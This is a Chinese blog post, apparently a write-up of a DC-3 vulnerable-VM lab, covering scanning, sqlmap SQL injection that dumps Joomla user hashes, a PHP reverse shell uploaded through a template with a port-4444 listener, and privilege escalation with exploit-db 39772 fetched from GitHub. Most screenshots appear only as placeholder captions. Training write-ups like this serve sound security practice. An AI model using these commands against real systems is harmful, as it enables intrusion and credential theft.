DC-3靶机渗透

1 获取ip
开机前一直按shift或Esc键
DC-3靶机渗透_第1张图片DC-3靶机渗透_第2张图片DC-3靶机渗透_第3张图片
ro recovery nomodeset改为quiet splash rw init=/bin/bash
DC-3靶机渗透_第4张图片
更改后按F10
DC-3靶机渗透_第5张图片
重启虚拟机
DC-3靶机渗透_第6张图片
2 端口扫描
DC-3靶机渗透_第7张图片
3 服务确认
DC-3靶机渗透_第8张图片
4 网站目录扫描
DC-3靶机渗透_第9张图片
5 查看页面
DC-3靶机渗透_第10张图片DC-3靶机渗透_第11张图片
joomscan扫描
joomscan --url http://192.168.182.139 -ec
DC-3靶机渗透_第12张图片
查看版本漏洞
在这里插入图片描述
查看文档
DC-3靶机渗透_第13张图片
6 SQL注入
数据库名
sqlmap -u “http://192.168.182.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
DC-3靶机渗透_第14张图片
表名
sqlmap -u “http://192.168.182.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
DC-3靶机渗透_第15张图片
字段名
sqlmap -u “http://192.168.182.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D joomladb -T ‘#__users’ --columns -p list[fullordering]
DC-3靶机渗透_第16张图片
用户名、密码
sqlmap -u “http://192.168.182.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D joomladb -T ‘#__users’ -C ‘name,password’ --dump -p list[fullordering]
DC-3靶机渗透_第17张图片
john解密
DC-3靶机渗透_第18张图片
7 登录查找上传点
DC-3靶机渗透_第19张图片
新建文件rsj.php
DC-3靶机渗透_第20张图片
访问http://192.168.182.139/templates/beez3/rsj.php,监听4444端口
在这里插入图片描述
8 提权
DC-3靶机渗透_第21张图片
查看版本漏洞
DC-3靶机渗透_第22张图片
查看文件
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
DC-3靶机渗透_第23张图片
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
下载解压 unzip 39772.zip,exploit.tar放在/var/www/html目录下
开启apache2
/etc/init.d/apache2 start
DC-3靶机渗透_第24张图片
tar -xvf exploit.tar
在这里插入图片描述
先执行compile.sh,生成doubleput
执行doubleput
DC-3靶机渗透_第25张图片

你可能感兴趣的:(linux,安全)